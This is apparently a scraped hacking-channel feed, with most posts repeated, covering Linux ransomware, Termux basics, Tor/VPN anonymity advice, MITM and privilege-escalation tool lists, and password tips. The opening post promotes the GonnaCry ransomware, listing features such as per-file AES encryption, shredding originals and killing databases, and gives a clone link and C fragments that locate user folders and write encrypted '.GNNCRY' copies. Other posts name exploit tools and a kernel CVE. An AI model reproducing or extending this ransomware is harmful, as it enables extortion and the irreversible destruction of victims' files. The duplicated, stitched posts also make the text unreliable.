β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 ransomware :
> A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:
π¦FEATURES
>encrypt all user files with AES-256-CBC.
>Random AES key and IV for each file.
>Works even without internet connection.
>Communication with the server to decrypt Client-private-key.
>encrypt AES key with client-public-key RSA-2048.
>encrypt client-private-key with RSA-2048 server-public-key.
>Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
>Decryptor that communicate to server to send keys.
>python webserver
>Daemon
>Kill databases
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£DOWNLOAD OR CLONE https://github.com/tarcisio-marinho/GonnaCry
2οΈβ£go dir then
3οΈβ£First the ransomware needs to know some pathβs, such as the desktop directory path, trash, home, etcβ¦
To get the user and home directory i will use some glibc librarys from unistd.h 12
char * home = get_home_enviroment(); // /home/USER/
char * desktop = get_desktop_enviroment(home); // /home/USER/Desktop/
char * username = get_username(); USERNAME
char * trash = get_trash_path(home); // /home/USER/.local/share/Trash/
char * media = get_media_path(username);
With the paths we can enter in each folder, find files inside it, create new files, whatever we want.
> First part - Finding the files
4οΈβ£For each file in the list, he will try to open and create a new file.
old = fopen(files->info[2], "rb");
if(old != NULL){
new_name = (char*) malloc(sizeof(char) * (strlen(files->info[2]) + 11));
strcpy(new_name, files->info[2]);
strcat(new_name, ".GNNCRY");
new = fopen(new_name, "wb");
5οΈβ£Generate a unique random key and IV for each file and call encrypt function(I let you guess what it does :slight_smile:).
6οΈβ£After the encryption, now we need to shred the old file, to never come back.
7οΈβ£Now the old file bytes are overwritten with zeros, and then deleted.
Even with some recovery tool software, the original file is lost.
goto Second part - Start Encryption; //This repeats for each file on the linked list.
Third part - create Desktop file: enc_files.gc
This file will help the decryptor to get the path, key and iv used to encrypt each file.
First field is the random Key, then the random IV and the file path.
π¦VIDEO TUTORIAL : https://youtu.be/pLluFxHrc30
ENJOYβ€οΈππ»
β 2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 ransomware :
> A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:
π¦FEATURES
>encrypt all user files with AES-256-CBC.
>Random AES key and IV for each file.
>Works even without internet connection.
>Communication with the server to decrypt Client-private-key.
>encrypt AES key with client-public-key RSA-2048.
>encrypt client-private-key with RSA-2048 server-public-key.
>Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
>Decryptor that communicate to server to send keys.
>python webserver
>Daemon
>Kill databases
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£DOWNLOAD OR CLONE https://github.com/tarcisio-marinho/GonnaCry
2οΈβ£go dir then
3οΈβ£First the ransomware needs to know some pathβs, such as the desktop directory path, trash, home, etcβ¦
To get the user and home directory i will use some glibc librarys from unistd.h 12
char * home = get_home_enviroment(); // /home/USER/
char * desktop = get_desktop_enviroment(home); // /home/USER/Desktop/
char * username = get_username(); USERNAME
char * trash = get_trash_path(home); // /home/USER/.local/share/Trash/
char * media = get_media_path(username);
With the paths we can enter in each folder, find files inside it, create new files, whatever we want.
> First part - Finding the files
4οΈβ£For each file in the list, he will try to open and create a new file.
old = fopen(files->info[2], "rb");
if(old != NULL){
new_name = (char*) malloc(sizeof(char) * (strlen(files->info[2]) + 11));
strcpy(new_name, files->info[2]);
strcat(new_name, ".GNNCRY");
new = fopen(new_name, "wb");
5οΈβ£Generate a unique random key and IV for each file and call encrypt function(I let you guess what it does :slight_smile:).
6οΈβ£After the encryption, now we need to shred the old file, to never come back.
7οΈβ£Now the old file bytes are overwritten with zeros, and then deleted.
Even with some recovery tool software, the original file is lost.
goto Second part - Start Encryption; //This repeats for each file on the linked list.
Third part - create Desktop file: enc_files.gc
This file will help the decryptor to get the path, key and iv used to encrypt each file.
First field is the random Key, then the random IV and the file path.
π¦VIDEO TUTORIAL : https://youtu.be/pLluFxHrc30
ENJOYβ€οΈππ»
β 2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - tarcisio-marinho/GonnaCry: A Linux Ransomware
A Linux Ransomware. Contribute to tarcisio-marinho/GonnaCry development by creating an account on GitHub.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TERMUX COMMANDS :
> Search for the specific package in termux:
pkg search package-name
It will show you all the package related to that package name.
>List all the available packages in termux:
pkg list-all
it will show you all the packages that are available in the APT repository of termux.
>Install a Package:
pkg install packageName
you can install any package from the list, just type pkg install package-name.
>Uninstall a Package:
pkg uninstall packageName
you can uninstall any package from the list, just type pkg uninstall package-name.it will ask you where if you wanna delete the package or not press y and the package will be uninstalled.
>Install Python in termux:
pkg install python
Just type this command and it will be installed in your termux press y if it asks for confirmation.after installing python you can write code and also run your own python scripts. Type python to check if python is properly installed or not.
>Install Git in termux:
pkg install git
Git will allow you to download any project from the github.
>Download projects from GitHub repository :
git clone Link-of-the-project
If you want to download any project from the git hub you can just use the above just change the Link-of-the-project with your link
e.g: git clone https://github.com/adi1090x/termux-style.git
>Check all the running processes in termux:
top
This command will show you all the tasks running on your termux. To quit the top command on termux just press CTRL+C on your keyboard.
π¦Need more ?
>https://www.learntermux.tech/2020/01/basic-commands-in-termux.html
ENJOYβ€οΈππ»
β 2020Termux
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TERMUX COMMANDS :
> Search for the specific package in termux:
pkg search package-name
It will show you all the package related to that package name.
>List all the available packages in termux:
pkg list-all
it will show you all the packages that are available in the APT repository of termux.
>Install a Package:
pkg install packageName
you can install any package from the list, just type pkg install package-name.
>Uninstall a Package:
pkg uninstall packageName
you can uninstall any package from the list, just type pkg uninstall package-name.it will ask you where if you wanna delete the package or not press y and the package will be uninstalled.
>Install Python in termux:
pkg install python
Just type this command and it will be installed in your termux press y if it asks for confirmation.after installing python you can write code and also run your own python scripts. Type python to check if python is properly installed or not.
>Install Git in termux:
pkg install git
Git will allow you to download any project from the github.
>Download projects from GitHub repository :
git clone Link-of-the-project
If you want to download any project from the git hub you can just use the above just change the Link-of-the-project with your link
e.g: git clone https://github.com/adi1090x/termux-style.git
>Check all the running processes in termux:
top
This command will show you all the tasks running on your termux. To quit the top command on termux just press CTRL+C on your keyboard.
π¦Need more ?
>https://www.learntermux.tech/2020/01/basic-commands-in-termux.html
ENJOYβ€οΈππ»
β 2020Termux
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - adi1090x/termux-style: Simple script to change color-schemes and fonts for Termux.
Simple script to change color-schemes and fonts for Termux. - adi1090x/termux-style
β β β Uππ»βΊπ«6π¬πβ β β β
π¦HACKERS REAL TIPS
#fAStTips
>Data-driven attack
A data-driven attack refers to an attack launched when a seemingly harmless special program sent or copied by a hacker to a target computer is executed. This attack allows hackers to modify files related to network security on the target computer, making it easier for hackers to invade the target computer next time. Data-driven attacks mainly include buffer overflow attacks, format string attacks, input verification attacks, synchronization vulnerability attacks, and trust vulnerability attacks.
>Forged information attack
Forged information attack refers to hackers sending fake routing information to construct a false path between the source computer and the target computer, so that the data packets flowing to the target computer pass through the computer operated by the hacker, so as to obtain the bank account in these data packets Personal sensitive information such as passwords.
>Attacks against information protocol weaknesses
In a local area network, the source path option of the IP address allows the IP packet to choose a path to the target computer. When a hacker tries to connect to an unreachable computer A located behind the firewall, he only needs to set the IP address source path option in the sent request packet, so that a destination address of the packet points to the firewall, but the final address points to Computer A. When the packet reaches the firewall, it is allowed to pass because it points to the firewall instead of computer A. The source path of the firewall's IP layer to process the message was changed and sent to the internal network, the message thus reached the unreachable computer A, thereby achieving a vulnerability attack on the information protocol.
>Remote control
Remote manipulation refers to a hacker launching an executable program in the target computer, the program will display a fake login interface, when the user enters account, password and other login information in the interface, the program will enter the account and password entered by the user To the hackerβs computer. At the same time, the program closes the login interface, prompting the message "System has failed" and asking the user to log in again. This attack is similar to phishing websites that are often encountered on the Internet.
>Attack by mistake of system administrator
In the local area network, people are one of the most important factors for the security of the local area network. When the system administrator makes mistakes such as configuration errors of the WWW server system and ordinary users expand user rights, these mistakes can provide hackers with an opportunity. Hackers use these mistakes, plus the command of finger, netstat, etc., to achieve intrusion attacks.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦HACKERS REAL TIPS
#fAStTips
>Data-driven attack
A data-driven attack refers to an attack launched when a seemingly harmless special program sent or copied by a hacker to a target computer is executed. This attack allows hackers to modify files related to network security on the target computer, making it easier for hackers to invade the target computer next time. Data-driven attacks mainly include buffer overflow attacks, format string attacks, input verification attacks, synchronization vulnerability attacks, and trust vulnerability attacks.
>Forged information attack
Forged information attack refers to hackers sending fake routing information to construct a false path between the source computer and the target computer, so that the data packets flowing to the target computer pass through the computer operated by the hacker, so as to obtain the bank account in these data packets Personal sensitive information such as passwords.
>Attacks against information protocol weaknesses
In a local area network, the source path option of the IP address allows the IP packet to choose a path to the target computer. When a hacker tries to connect to an unreachable computer A located behind the firewall, he only needs to set the IP address source path option in the sent request packet, so that a destination address of the packet points to the firewall, but the final address points to Computer A. When the packet reaches the firewall, it is allowed to pass because it points to the firewall instead of computer A. The source path of the firewall's IP layer to process the message was changed and sent to the internal network, the message thus reached the unreachable computer A, thereby achieving a vulnerability attack on the information protocol.
>Remote control
Remote manipulation refers to a hacker launching an executable program in the target computer, the program will display a fake login interface, when the user enters account, password and other login information in the interface, the program will enter the account and password entered by the user To the hackerβs computer. At the same time, the program closes the login interface, prompting the message "System has failed" and asking the user to log in again. This attack is similar to phishing websites that are often encountered on the Internet.
>Attack by mistake of system administrator
In the local area network, people are one of the most important factors for the security of the local area network. When the system administrator makes mistakes such as configuration errors of the WWW server system and ordinary users expand user rights, these mistakes can provide hackers with an opportunity. Hackers use these mistakes, plus the command of finger, netstat, etc., to achieve intrusion attacks.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Common errors leading to deanonymization:
1. Anonymity in social networks
If you are registered in vk (social network) by entering your phone number. Then they connected to vk via Tor in order to write βNikiforov S.S. thief". Does this mean that you are anonymous - did you use Tor?
No, it doesnβt. If only because a phone number is tied to your social network account. And for your identification, the IP address is not particularly needed.
2. Anonymity and cookies
Cookies are small pieces of information that are stored in your web browser after the site sends them to you.
If you went to the site, received your cookies, then reconnected via Tor and wrote in the comments something like βdeputy of the second convocation of the City Duma Petrov D.S. also a thief β, then cookies can link the author of a comment and a user who has previously logged in with a different IP address.
Cookies are designed to identify the user regardless of your IP address.
3. Many sites store the IP of previous actions
For example, I registered a VPN account to which I will connect through Tor. But I registered it from my IP (βbecause Tor is slow, and indeed that site does not accept connections from the Tor network). Will I be anonymous if I connect to a VPN via Tor? No, because information about previous operations with the IP address is saved.
4. I WILL BUY a VPN (or VPS server to configure OpenVPN) and will be anonymous
Even if you read the third paragraph and went to register through Tor, but use wallets that can lead to you, then there is no question of any anonymity. Moreover, when buying one-time SIM cards and when entering the wallet sites, you also need to remember about your anonymity, otherwise it is all just meaningless.
That is why just Tor is more anonymous than Tor + OpenVPN. It is quite difficult to buy something without leaving a trace.
5. OpenVPN is very good, but not for anonymity
If we recall the original purpose of VPN networks, then this is an organization of virtual private networks, inside of which computers scattered around the world, can access each other's local network resources. At the same time, traffic exchange is encrypted, but this traffic is encrypted only for an external observer, but not for the server and clients of the OpenVPN network.
For this reason, if you purchased a free or paid VPN account, then be prepared that the server owner can do with your traffic WHAT PLEASANT and keeps activity logs - what requests were made from which client.
6. There are 1000 and 1 ways to find out the real IP address of a remote user
Options are from the simplest to send a link to a controlled site and see the IP (if communicating through an anonymous messenger) or a file with a trojan to completely sophisticated methods.
7. If you use any software with closed source code for illegal activities, then there is 100% backdoor installed
Backdoors can also be in legitimate software with closed source code - as a hard-to-detect vulnerability that the manufacturer knows about, or just an ordinary backdoor that is dumb like a cork - these were found, for example, in the official firmware of routers.
As for the illegal software with closed source code that is distributed anonymously, please tell me, well, why not install a backdoor there? The owner does not know anything, and even if he finds out what he will do? Heβll go to the police and say: I bought scripts to crack the protection of stolen phones, and they installed a virus there ... Itβs unlikely that he will.
8. Misunderstanding of the simplest technical aspects of the operation of networks, servers, applications, information accumulated and available in open sources
In my articles, the links to which I gave above, I found the sites of the attacker simply by analyzing where the POST request goes. Why did the attacker leave scripts on this site in the archive? Apparently, I just did not know that it is very easy to track where the POST request goes even if the HTML code is obfuscated.
π¦Common errors leading to deanonymization:
1. Anonymity in social networks
If you are registered in vk (social network) by entering your phone number. Then they connected to vk via Tor in order to write βNikiforov S.S. thief". Does this mean that you are anonymous - did you use Tor?
No, it doesnβt. If only because a phone number is tied to your social network account. And for your identification, the IP address is not particularly needed.
2. Anonymity and cookies
Cookies are small pieces of information that are stored in your web browser after the site sends them to you.
If you went to the site, received your cookies, then reconnected via Tor and wrote in the comments something like βdeputy of the second convocation of the City Duma Petrov D.S. also a thief β, then cookies can link the author of a comment and a user who has previously logged in with a different IP address.
Cookies are designed to identify the user regardless of your IP address.
3. Many sites store the IP of previous actions
For example, I registered a VPN account to which I will connect through Tor. But I registered it from my IP (βbecause Tor is slow, and indeed that site does not accept connections from the Tor network). Will I be anonymous if I connect to a VPN via Tor? No, because information about previous operations with the IP address is saved.
4. I WILL BUY a VPN (or VPS server to configure OpenVPN) and will be anonymous
Even if you read the third paragraph and went to register through Tor, but use wallets that can lead to you, then there is no question of any anonymity. Moreover, when buying one-time SIM cards and when entering the wallet sites, you also need to remember about your anonymity, otherwise it is all just meaningless.
That is why just Tor is more anonymous than Tor + OpenVPN. It is quite difficult to buy something without leaving a trace.
5. OpenVPN is very good, but not for anonymity
If we recall the original purpose of VPN networks, then this is an organization of virtual private networks, inside of which computers scattered around the world, can access each other's local network resources. At the same time, traffic exchange is encrypted, but this traffic is encrypted only for an external observer, but not for the server and clients of the OpenVPN network.
For this reason, if you purchased a free or paid VPN account, then be prepared that the server owner can do with your traffic WHAT PLEASANT and keeps activity logs - what requests were made from which client.
6. There are 1000 and 1 ways to find out the real IP address of a remote user
Options are from the simplest to send a link to a controlled site and see the IP (if communicating through an anonymous messenger) or a file with a trojan to completely sophisticated methods.
7. If you use any software with closed source code for illegal activities, then there is 100% backdoor installed
Backdoors can also be in legitimate software with closed source code - as a hard-to-detect vulnerability that the manufacturer knows about, or just an ordinary backdoor that is dumb like a cork - these were found, for example, in the official firmware of routers.
As for the illegal software with closed source code that is distributed anonymously, please tell me, well, why not install a backdoor there? The owner does not know anything, and even if he finds out what he will do? Heβll go to the police and say: I bought scripts to crack the protection of stolen phones, and they installed a virus there ... Itβs unlikely that he will.
8. Misunderstanding of the simplest technical aspects of the operation of networks, servers, applications, information accumulated and available in open sources
In my articles, the links to which I gave above, I found the sites of the attacker simply by analyzing where the POST request goes. Why did the attacker leave scripts on this site in the archive? Apparently, I just did not know that it is very easy to track where the POST request goes even if the HTML code is obfuscated.
And there can be many such βtechnicalβ punctures: a simple SSH connection password (βno one knows where my server isβ), a misunderstanding of what information the researcher can get on the server, a misunderstanding why Cloudflare is needed, etc.
9. The big picture
Example: infrastructure objects and IP traces are attacked and other indirect signs lead to somewhere far away. But at the same time, the objects and methods of attack are similar to those used by the well-known hacker group. At least there is reason to think.
10. Metadata in files
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
9. The big picture
Example: infrastructure objects and IP traces are attacked and other indirect signs lead to somewhere far away. But at the same time, the objects and methods of attack are similar to those used by the well-known hacker group. At least there is reason to think.
10. Metadata in files
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Do I need to use Tor with VPN, proxy, SSH?
> This is a common question in different variations. And there is no definite answer to it. Suppose in my country or my Internet service provider is blocking access to the Tor network, then not so much good as the only solution is to use VPN + Tor. At the same time,
> so i must clearly understand the risks of a VPN, which is designed for organizing virtual private networks, and not anonymity. If I DO NOT understand the risks of adding different intermediate nodes, and I just do it because I read something better on some forum, then this is a bad idea: there is no working technology to find out the real IP address of a Tor network user, but VPN βhoneypot "Will know everything about you:
1οΈβ£your real IP address
2οΈβ£what sites did you make requests to
what answers received
3οΈβ£Further translation from the pages of the official Tor Project documentation. I agree with these views, provided that there is trust in the Tor network. I do NOT have 100% trust in the Tor network, but of the other options for hiding my IP, this is the best solution.
π¦Sources:
https://support.torproject.org/faq/faq-5/
https://trac.torproject.org/projects/tor/wiki/doc/TorPlusVPN
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Do I need to use Tor with VPN, proxy, SSH?
> This is a common question in different variations. And there is no definite answer to it. Suppose in my country or my Internet service provider is blocking access to the Tor network, then not so much good as the only solution is to use VPN + Tor. At the same time,
> so i must clearly understand the risks of a VPN, which is designed for organizing virtual private networks, and not anonymity. If I DO NOT understand the risks of adding different intermediate nodes, and I just do it because I read something better on some forum, then this is a bad idea: there is no working technology to find out the real IP address of a Tor network user, but VPN βhoneypot "Will know everything about you:
1οΈβ£your real IP address
2οΈβ£what sites did you make requests to
what answers received
3οΈβ£Further translation from the pages of the official Tor Project documentation. I agree with these views, provided that there is trust in the Tor network. I do NOT have 100% trust in the Tor network, but of the other options for hiding my IP, this is the best solution.
π¦Sources:
https://support.torproject.org/faq/faq-5/
https://trac.torproject.org/projects/tor/wiki/doc/TorPlusVPN
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
support.torproject.org
Can I use a VPN with Tor? | Tor Project | Support
Defend yourself against tracking and surveillance. Circumvent censorship. | Can I use a VPN with Tor?
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Anonymity and privacy
> You can very much violate your anonymity by using VPN / SSH in addition to Tor. (Proxies are described below.) But if you know what you are doing, then you can increase anonymity, security, and privacy.
> VPN / SSH providers keep a history of financial transactions and you will leave traces if you do not choose a truly anonymous payment method. VPN / SSH acts as a permanent ingress or as a persistent egress node. This may solve some problems, but create new risks.
> Who is your opponent? Against a global adversary with unlimited resources, adding new intermediate nodes makes passive attacks (a bit) harder, but active attacks become easier as you provide more surface to attack and send more data that you can use.
> Adding hosts strengthens you against collusion between Tor hosts and against blackhack hackers who target the Tor client code (especially if Tor and VPN work on two different systems).
> If the VPN / SSH server is under the control of an attacker, you are weakening the protection provided by Tor. If the server is trustworthy, you can increase the anonymity and / or privacy (depending on the settings) provided by Tor.
> VPN / SSH can also be used to circumvent Tor censorship (if your ISP blocks access to Tor or if the end node blocks connections from the Tor network).
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Anonymity and privacy
> You can very much violate your anonymity by using VPN / SSH in addition to Tor. (Proxies are described below.) But if you know what you are doing, then you can increase anonymity, security, and privacy.
> VPN / SSH providers keep a history of financial transactions and you will leave traces if you do not choose a truly anonymous payment method. VPN / SSH acts as a permanent ingress or as a persistent egress node. This may solve some problems, but create new risks.
> Who is your opponent? Against a global adversary with unlimited resources, adding new intermediate nodes makes passive attacks (a bit) harder, but active attacks become easier as you provide more surface to attack and send more data that you can use.
> Adding hosts strengthens you against collusion between Tor hosts and against blackhack hackers who target the Tor client code (especially if Tor and VPN work on two different systems).
> If the VPN / SSH server is under the control of an attacker, you are weakening the protection provided by Tor. If the server is trustworthy, you can increase the anonymity and / or privacy (depending on the settings) provided by Tor.
> VPN / SSH can also be used to circumvent Tor censorship (if your ISP blocks access to Tor or if the end node blocks connections from the Tor network).
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Microsoft Office β DDE Attacks.pdf
693.1 KB
MS OFFICE DDE ATTACK -TUTORIAL
β β β Uππ»βΊπ«6π¬πβ β β β
π¦VPN / SSH vs proxy :
> The connection between you and the VPN / SSH is encrypted, but not always.
> On the other hand, the connection between you and OpenProxy is not encrypted. The "SSL proxy" in most cases is the only http proxy that supports the connect method. The connect method was originally designed so that you can use SSL connections to web servers, but other interesting things are possible, such as connecting to IRC, SSH, etc.
> Another disadvantage of http (s) proxies is that some of them, even depending on your network settings, even pass your IP through the βhttp forwarded forβ header . (Such proxies are also called βnon-anonymous proxies.β Although the word βanonymousβ should be understood with caution in any case, OpenProxy alone is much worse than Tor.)
π¦VPN vs SSH or proxy :
> VPN works at the network level. The SSH tunnel can offer socks5 proxies. Proxies work at the application level. These technical details create their own problems when combined with Tor.
> The problem for many VPN users is the complicated setup. They connect to the VPN on a machine that has direct access to the Internet.
> VPN user may forget to connect to VPN first
Without special precautions, when a VPN connection is disconnected (VPN server reboot, network problems, VPN process failure, etc.), direct connections without VPN will be performed.
To solve this problem, you can try something like VPN-Firewall.
> When working at the application level (using socks5 SSH tunnels or proxy servers), the problem is that many applications do not comply with the proxy server settings.
> The most secure solution to resolve these problems is to use a transparent proxy, which is possible for VPN, SSH and proxies.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦VPN / SSH vs proxy :
> The connection between you and the VPN / SSH is encrypted, but not always.
> On the other hand, the connection between you and OpenProxy is not encrypted. The "SSL proxy" in most cases is the only http proxy that supports the connect method. The connect method was originally designed so that you can use SSL connections to web servers, but other interesting things are possible, such as connecting to IRC, SSH, etc.
> Another disadvantage of http (s) proxies is that some of them, even depending on your network settings, even pass your IP through the βhttp forwarded forβ header . (Such proxies are also called βnon-anonymous proxies.β Although the word βanonymousβ should be understood with caution in any case, OpenProxy alone is much worse than Tor.)
π¦VPN vs SSH or proxy :
> VPN works at the network level. The SSH tunnel can offer socks5 proxies. Proxies work at the application level. These technical details create their own problems when combined with Tor.
> The problem for many VPN users is the complicated setup. They connect to the VPN on a machine that has direct access to the Internet.
> VPN user may forget to connect to VPN first
Without special precautions, when a VPN connection is disconnected (VPN server reboot, network problems, VPN process failure, etc.), direct connections without VPN will be performed.
To solve this problem, you can try something like VPN-Firewall.
> When working at the application level (using socks5 SSH tunnels or proxy servers), the problem is that many applications do not comply with the proxy server settings.
> The most secure solution to resolve these problems is to use a transparent proxy, which is possible for VPN, SSH and proxies.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
My Top 5 Web Hacking Tools.pdf
320.5 KB
TOP 5 WEB HACKING TOOLS & METHODES VIA PICTURES
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Top 2020 #MITM tools :
BetterCAP | MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in realtime, sniff for credentials and much more.
Burp Suite | GUI based tool for testing Web application security.
Ettercap | Ettercap is a comprehensive suite for man in the middle attacks
Evilginx | Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service.
MITMf | Framework for Man-In-The-Middle attacks
mitmproxy | An interactive console program that allows traffic flows to be intercepted, inspected, modified and replayed
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Top 2020 #MITM tools :
BetterCAP | MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in realtime, sniff for credentials and much more.
Burp Suite | GUI based tool for testing Web application security.
Ettercap | Ettercap is a comprehensive suite for man in the middle attacks
Evilginx | Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service.
MITMf | Framework for Man-In-The-Middle attacks
mitmproxy | An interactive console program that allows traffic flows to be intercepted, inspected, modified and replayed
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
portswigger.net
Burp - Web Application Security, Testing, & Scanning - PortSwigger
PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some popular Search Engine for leaks & bugs.. for Penetration Tester
Spyse | Spyse collects valuable data from all open source internet and stores it in its own database to provide instant access to the data.
Censys | Censys continually monitors every reachable server and device on the Internet, so you can search for and analyze them in real time
Shodan | Shodan is the world's first search engine for Internet-connected devices.
WiGLE | Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers.
Zoomeye | search engine for cyberspace that lets the user find specific network components(ip, services, etc.)
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some popular Search Engine for leaks & bugs.. for Penetration Tester
Spyse | Spyse collects valuable data from all open source internet and stores it in its own database to provide instant access to the data.
Censys | Censys continually monitors every reachable server and device on the Internet, so you can search for and analyze them in real time
Shodan | Shodan is the world's first search engine for Internet-connected devices.
WiGLE | Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers.
Zoomeye | search engine for cyberspace that lets the user find specific network components(ip, services, etc.)
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Source Code Analysis & decryption Tools
pyup | Automated Security and Dependency Updates
RIPS | PHP Security Analysis
Retire.js | detecting the use of JavaScript libraries with known vulnerabilities
Snyk | find & fix vulnerabilities in dependencies, supports various languages
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Source Code Analysis & decryption Tools
pyup | Automated Security and Dependency Updates
RIPS | PHP Security Analysis
Retire.js | detecting the use of JavaScript libraries with known vulnerabilities
Snyk | find & fix vulnerabilities in dependencies, supports various languages
β β β Uππ»βΊπ«6π¬πβ β β β
Getsafety
Safety | Software Supply Chain Firewall & Security
Prevent vulnerable and malicious packages from entering your software supply chain with Safety's AI-powered platform. Protection for Python, Java, and JavaScript ecosystems.
Tracking Users_ From Cookies to DeviceFingerprinting.pdf
320.4 KB
Tracking via cookies methode
β β β Uππ»βΊπ«6π¬πβ β β β
π¦DANGEROUS EXPLOIT TOOLS-USE CVE:
LinEnum | Scripted Local Linux Enumeration & Privilege Escalation Checks
CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation
Oracle Privilege Escalation via Deserialization | CVE-2018-3004 Oracle Privilege Escalation via Deserialization
linux-exploit-suggester | The tool is meant to assist the security analyst in his testing for privilege escalation opportunities on Linux machine
BeRoot Project | BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.
yodo: Local Privilege Escalation | yodo proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.
Share usβ€οΈππ»
β GIT SOURCES 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦DANGEROUS EXPLOIT TOOLS-USE CVE:
LinEnum | Scripted Local Linux Enumeration & Privilege Escalation Checks
CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation
Oracle Privilege Escalation via Deserialization | CVE-2018-3004 Oracle Privilege Escalation via Deserialization
linux-exploit-suggester | The tool is meant to assist the security analyst in his testing for privilege escalation opportunities on Linux machine
BeRoot Project | BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.
yodo: Local Privilege Escalation | yodo proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.
Share usβ€οΈππ»
β GIT SOURCES 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
Scripted Local Linux Enumeration & Privilege Escalation Checks - rebootuser/LinEnum
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Why Use Password Managers ?
#FastTips
The main rules for the safe use of passwords:
>the password must be complex (i.e. include 4 groups of
>characters - uppercase and lowercase letters, numbers, special
>characters - and not consist of words or a combination of them that can be found in the dictionary)
>you cannot use the same password on different sites and services, because compromising your password, for example, on a poorly protected site / forum, can give an attacker access to your mail, cloud storage, social networks, network folder, etc.
>passwords should not be stored on a computer in text files, as well as in public places (a sticker with a password on a computer is also bad)
>Under these conditions, you need to remember a large number of complex passwords, which is practically impossible. Therefore, many users do not comply with these conditions (which is bad), and those who comply are forced to write passwords, for example, to a text file (if the file is not encrypted, then this is also bad).
π¦A password manager can help in this situation - a program that stores your password in encrypted form. That is, instead of many passwords, you only need to remember one master password.
written by undercode
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Why Use Password Managers ?
#FastTips
The main rules for the safe use of passwords:
>the password must be complex (i.e. include 4 groups of
>characters - uppercase and lowercase letters, numbers, special
>characters - and not consist of words or a combination of them that can be found in the dictionary)
>you cannot use the same password on different sites and services, because compromising your password, for example, on a poorly protected site / forum, can give an attacker access to your mail, cloud storage, social networks, network folder, etc.
